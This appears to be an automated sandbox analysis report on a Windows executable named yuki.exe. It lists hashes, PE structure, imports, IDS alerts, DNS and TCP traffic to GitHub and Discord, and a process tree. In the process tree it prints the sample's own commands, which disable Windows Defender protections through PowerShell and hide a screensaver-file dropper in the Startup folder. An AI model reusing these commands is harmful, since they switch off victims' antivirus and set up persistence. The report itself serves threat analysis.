                                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28672
                                                                                                    Entropy (8bit):2.5793180405395284
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Entropy (8bit):7.999590173530119
                                                                                                    TrID:
                                                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:yuki.exe
                                                                                                    File size:61'460'987 bytes
                                                                                                    MD5:75f2c40c5fd05b5824d88867c17afb49
                                                                                                    SHA1:9e29b9a694b3010def637b18f245ca8635723649
                                                                                                    SHA256:1c0d63ed602d3c5b4c7fea32e801ab1b2610f7e9d50c3ccb7ca9550810ea2e0a
                                                                                                    SHA512:8cec0852574ef93a0491e62801ca87f087701c56ca7f2552f3010aa33afd197d7f6963fb4dabae3a35ae6993a7c10697531de059fb6891b2749aa8006d4a69f8
                                                                                                    SSDEEP:1572864:vWD0LQqMrlpA+Ql4Jd0xTivfSpmqif8iNv:uOyklm0xenJ/R9
                                                                                                    TLSH:E3D7334C67E188E9EDBB34B96BC0A23241AB78D12731FB8D9B9007364D773D58C3A516
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d..
                                                                                                    Icon Hash:1e474938f849090b
                                                                                                    Entrypoint:0x14000cdb0
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:true
                                                                                                    Imagebase:0x140000000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x672C1678 [Thu Nov 7 01:23:04 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:6
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:6
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:6
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                    Signature Valid:false
                                                                                                    Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                    Error Number:-2146869232
                                                                                                    Not Before, Not After
                                                                                                    • 14/07/2023 00:45:38 16/09/2024 00:45:38
                                                                                                    Subject Chain
                                                                                                    • CN=Microsoft 3rd Party Application Component, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                    Version:3
                                                                                                    Thumbprint MD5:4C49C4D2AA6040EE1D84AE21B9B5FD09
                                                                                                    Thumbprint SHA-1:8BE3A0CD11B786FDD08057E34D82FC5488EB7286
                                                                                                    Thumbprint SHA-256:CE8DDC8FA94C4499F21E3EDF6F868979E919024BAB1658277676CD049E0B69C6
                                                                                                    Serial:3300000384D9687D66CC754BA1000000000384
                                                                                                    Instruction
                                                                                                    dec eax
                                                                                                    sub esp, 28h
                                                                                                    call 00007F8328E4016Ch
                                                                                                    dec eax
                                                                                                    add esp, 28h
                                                                                                    jmp 00007F8328E3FD8Fh
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    dec eax
                                                                                                    sub esp, 28h
                                                                                                    call 00007F8328E40538h
                                                                                                    test eax, eax
                                                                                                    je 00007F8328E3FF33h
                                                                                                    dec eax
                                                                                                    mov eax, dword ptr [00000030h]
                                                                                                    dec eax
                                                                                                    mov ecx, dword ptr [eax+08h]
                                                                                                    jmp 00007F8328E3FF17h
                                                                                                    dec eax
                                                                                                    cmp ecx, eax
                                                                                                    je 00007F8328E3FF26h
                                                                                                    xor eax, eax
                                                                                                    dec eax
                                                                                                    cmpxchg dword ptr [0003577Ch], ecx
                                                                                                    jne 00007F8328E3FF00h
                                                                                                    xor al, al
                                                                                                    dec eax
                                                                                                    add esp, 28h
                                                                                                    ret
                                                                                                    mov al, 01h
                                                                                                    jmp 00007F8328E3FF09h
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    dec eax
                                                                                                    sub esp, 28h
                                                                                                    test ecx, ecx
                                                                                                    jne 00007F8328E3FF19h
                                                                                                    mov byte ptr [00035765h], 00000001h
                                                                                                    call 00007F8328E3F665h
                                                                                                    call 00007F8328E40950h
                                                                                                    test al, al
                                                                                                    jne 00007F8328E3FF16h
                                                                                                    xor al, al
                                                                                                    jmp 00007F8328E3FF26h
                                                                                                    call 00007F8328E4D46Fh
                                                                                                    test al, al
                                                                                                    jne 00007F8328E3FF1Bh
                                                                                                    xor ecx, ecx
                                                                                                    call 00007F8328E40960h
                                                                                                    jmp 00007F8328E3FEFCh
                                                                                                    mov al, 01h
                                                                                                    dec eax
                                                                                                    add esp, 28h
                                                                                                    ret
                                                                                                    int3
                                                                                                    int3
                                                                                                    inc eax
                                                                                                    push ebx
                                                                                                    dec eax
                                                                                                    sub esp, 20h
                                                                                                    cmp byte ptr [0003572Ch], 00000000h
                                                                                                    mov ebx, ecx
                                                                                                    jne 00007F8328E3FF79h
                                                                                                    cmp ecx, 01h
                                                                                                    jnbe 00007F8328E3FF7Ch
                                                                                                    call 00007F8328E404AEh
                                                                                                    test eax, eax
                                                                                                    je 00007F8328E3FF3Ah
                                                                                                    test ebx, ebx
                                                                                                    jne 00007F8328E3FF36h
                                                                                                    dec eax
                                                                                                    lea ecx, dword ptr [00035716h]
                                                                                                    call 00007F8328E4D262h
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca5c0x78.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x16f0c.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2250.pdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x3a9a9cb0x2830
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5e0000x764.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x10000x29f000x2a0002a7ae207b6295492e9da088072661752False0.5514439174107143data6.487454925709845IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0x2b0000x12a500x12c003eef798260fe4476872318befd476f5fFalse0.5244791666666667data5.752648993638012IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .pdata0x440000x22500x2400f5559f14427a02f0a5dbd0dd026cae54False0.470703125data5.291665041994019IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0x470000x16f0c0x170005a9672a834628aafb5feb8e8a6e35746False0.979248046875data7.975411273493792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x5e0000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_ICON0x472500x32fPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0134969325153373
                                                                                                    RT_ICON0x475800x5f9PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0071942446043165
                                                                                                    RT_ICON0x47b7c0x95aPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.004594820384294
                                                                                                    RT_ICON0x484d80x10f6PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0025333947489636
                                                                                                    RT_ICON0x495d00x19c9PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.0016664141796698
                                                                                                    RT_ICON0x4af9c0x4a97PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced1.0008379156847342
                                                                                                    RT_ICON0x4fa340xdb9dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9972785969655467
                                                                                                    RT_GROUP_ICON0x5d5d40x68data0.7884615384615384
                                                                                                    RT_VERSION0x5d63c0x3c0data0.4510416666666667
                                                                                                    RT_MANIFEST0x5d9fc0x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                    DLLImport
                                                                                                    USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                    COMCTL32.dll
                                                                                                    KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                    ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                    GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-11-07T08:36:19.886155+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449730TCP
                                                                                                    2024-11-07T08:36:40.605802+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.454135TCP
                                                                                                    2024-11-07T08:36:42.599028+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.454137TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 7, 2024 08:36:26.695992947 CET49738443192.168.2.4185.199.109.133
                                                                                                    Nov 7, 2024 08:36:26.696011066 CET44349738185.199.109.133192.168.2.4
                                                                                                    Nov 7, 2024 08:36:26.696083069 CET49738443192.168.2.4185.199.109.133
                                                                                                    Nov 7, 2024 08:36:26.696515083 CET49738443192.168.2.4185.199.109.133
                                                                                                    Nov 7, 2024 08:36:26.696527958 CET44349738185.199.109.133192.168.2.4
                                                                                                    Nov 7, 2024 08:36:27.303468943 CET44349738185.199.109.133192.168.2.4
                                                                                                    Nov 7, 2024 08:36:27.303929090 CET49738443192.168.2.4185.199.109.133
                                                                                                    Nov 7, 2024 08:36:27.303944111 CET44349738185.199.109.133192.168.2.4
                                                                                                    Nov 7, 2024 08:36:27.305003881 CET44349738185.199.109.133192.168.2.4
                                                                                                    Nov 7, 2024 08:36:27.305074930 CET49738443192.168.2.4185.199.109.133
                                                                                                    Nov 7, 2024 08:36:27.306184053 CET49738443192.168.2.4185.199.109.133
                                                                                                    Nov 7, 2024 08:36:27.306324959 CET49738443192.168.2.4185.199.109.133
                                                                                                    Nov 7, 2024 08:36:40.448654890 CET54136443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:36:40.448688984 CET44354136162.159.138.232192.168.2.4
                                                                                                    Nov 7, 2024 08:36:40.448753119 CET54136443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:36:40.449348927 CET54136443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:36:40.449363947 CET44354136162.159.138.232192.168.2.4
                                                                                                    Nov 7, 2024 08:36:41.067359924 CET44354136162.159.138.232192.168.2.4
                                                                                                    Nov 7, 2024 08:36:41.067958117 CET54136443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:36:41.067970037 CET44354136162.159.138.232192.168.2.4
                                                                                                    Nov 7, 2024 08:36:41.069322109 CET44354136162.159.138.232192.168.2.4
                                                                                                    Nov 7, 2024 08:36:41.069438934 CET54136443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:36:41.070475101 CET54136443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:36:41.070548058 CET54136443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:37:07.871630907 CET54169443192.168.2.4185.199.110.133
                                                                                                    Nov 7, 2024 08:37:07.871639967 CET44354169185.199.110.133192.168.2.4
                                                                                                    Nov 7, 2024 08:37:07.871701956 CET54169443192.168.2.4185.199.110.133
                                                                                                    Nov 7, 2024 08:37:07.901698112 CET54169443192.168.2.4185.199.110.133
                                                                                                    Nov 7, 2024 08:37:07.901710987 CET44354169185.199.110.133192.168.2.4
                                                                                                    Nov 7, 2024 08:37:08.502392054 CET44354169185.199.110.133192.168.2.4
                                                                                                    Nov 7, 2024 08:37:08.508620977 CET54169443192.168.2.4185.199.110.133
                                                                                                    Nov 7, 2024 08:37:08.508644104 CET44354169185.199.110.133192.168.2.4
                                                                                                    Nov 7, 2024 08:37:08.509696007 CET44354169185.199.110.133192.168.2.4
                                                                                                    Nov 7, 2024 08:37:08.509768009 CET54169443192.168.2.4185.199.110.133
                                                                                                    Nov 7, 2024 08:37:08.520261049 CET54169443192.168.2.4185.199.110.133
                                                                                                    Nov 7, 2024 08:37:08.520435095 CET44354169185.199.110.133192.168.2.4
                                                                                                    Nov 7, 2024 08:37:08.520478964 CET54169443192.168.2.4185.199.110.133
                                                                                                    Nov 7, 2024 08:37:08.520596027 CET54169443192.168.2.4185.199.110.133
                                                                                                    Nov 7, 2024 08:37:23.974119902 CET54256443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:37:23.974152088 CET44354256162.159.138.232192.168.2.4
                                                                                                    Nov 7, 2024 08:37:23.974410057 CET54256443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:37:23.974953890 CET54256443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:37:23.974965096 CET44354256162.159.138.232192.168.2.4
                                                                                                    Nov 7, 2024 08:37:24.766124010 CET44354256162.159.138.232192.168.2.4
                                                                                                    Nov 7, 2024 08:37:24.766593933 CET54256443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:37:24.766607046 CET44354256162.159.138.232192.168.2.4
                                                                                                    Nov 7, 2024 08:37:24.767673969 CET44354256162.159.138.232192.168.2.4
                                                                                                    Nov 7, 2024 08:37:24.767735958 CET54256443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:37:24.769057989 CET54256443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:37:24.769192934 CET44354256162.159.138.232192.168.2.4
                                                                                                    Nov 7, 2024 08:37:24.769205093 CET54256443192.168.2.4162.159.138.232
                                                                                                    Nov 7, 2024 08:37:24.769428015 CET54256443192.168.2.4162.159.138.232
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Nov 7, 2024 08:36:26.688097954 CET5155553192.168.2.41.1.1.1
                                                                                                    Nov 7, 2024 08:36:26.695162058 CET53515551.1.1.1192.168.2.4
                                                                                                    Nov 7, 2024 08:36:34.175143003 CET5353120162.159.36.2192.168.2.4
                                                                                                    Nov 7, 2024 08:36:34.833022118 CET6463053192.168.2.41.1.1.1
                                                                                                    Nov 7, 2024 08:36:34.843935013 CET53646301.1.1.1192.168.2.4
                                                                                                    Nov 7, 2024 08:36:40.440907001 CET4969253192.168.2.41.1.1.1
                                                                                                    Nov 7, 2024 08:36:40.447709084 CET53496921.1.1.1192.168.2.4
                                                                                                    Nov 7, 2024 08:37:07.856636047 CET5510153192.168.2.41.1.1.1
                                                                                                    Nov 7, 2024 08:37:07.863384962 CET53551011.1.1.1192.168.2.4
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Nov 7, 2024 08:36:26.688097954 CET192.168.2.41.1.1.10x95d9Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:36:34.833022118 CET192.168.2.41.1.1.10x89cStandard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:36:40.440907001 CET192.168.2.41.1.1.10x6f95Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:37:07.856636047 CET192.168.2.41.1.1.10x2bd7Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Nov 7, 2024 08:36:26.695162058 CET1.1.1.1192.168.2.40x95d9No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:36:26.695162058 CET1.1.1.1192.168.2.40x95d9No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:36:26.695162058 CET1.1.1.1192.168.2.40x95d9No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:36:26.695162058 CET1.1.1.1192.168.2.40x95d9No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:36:34.843935013 CET1.1.1.1192.168.2.40x89cName error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:36:40.447709084 CET1.1.1.1192.168.2.40x6f95No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:36:40.447709084 CET1.1.1.1192.168.2.40x6f95No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:36:40.447709084 CET1.1.1.1192.168.2.40x6f95No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:36:40.447709084 CET1.1.1.1192.168.2.40x6f95No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:36:40.447709084 CET1.1.1.1192.168.2.40x6f95No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:37:07.863384962 CET1.1.1.1192.168.2.40x2bd7No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:37:07.863384962 CET1.1.1.1192.168.2.40x2bd7No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:37:07.863384962 CET1.1.1.1192.168.2.40x2bd7No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                    Nov 7, 2024 08:37:07.863384962 CET1.1.1.1192.168.2.40x2bd7No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false

                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:02:36:01
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Users\user\Desktop\yuki.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\yuki.exe"
                                                                                                    Imagebase:0x7ff6c81f0000
                                                                                                    File size:61'460'987 bytes
                                                                                                    MD5 hash:75F2C40C5FD05B5824D88867C17AFB49
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:1
                                                                                                    Start time:02:36:09
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Users\user\Desktop\yuki.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\yuki.exe"
                                                                                                    Imagebase:0x7ff6c81f0000
                                                                                                    File size:61'460'987 bytes
                                                                                                    MD5 hash:75F2C40C5FD05B5824D88867C17AFB49
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:5
                                                                                                    Start time:02:36:26
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
                                                                                                    Imagebase:0x7ff610c60000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:02:36:26
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:7
                                                                                                    Start time:02:36:26
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:02:36:27
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c attrib +h +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr"
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:289'792 bytes
                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:9
                                                                                                    Start time:02:36:27
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:10
                                                                                                    Start time:02:36:27
                                                                                                    Start date:07/11/2024
                                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:attrib +h +s "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr"
                                                                                                    Imagebase:0x7ff67e280000
                                                                                                    File size:23'040 bytes
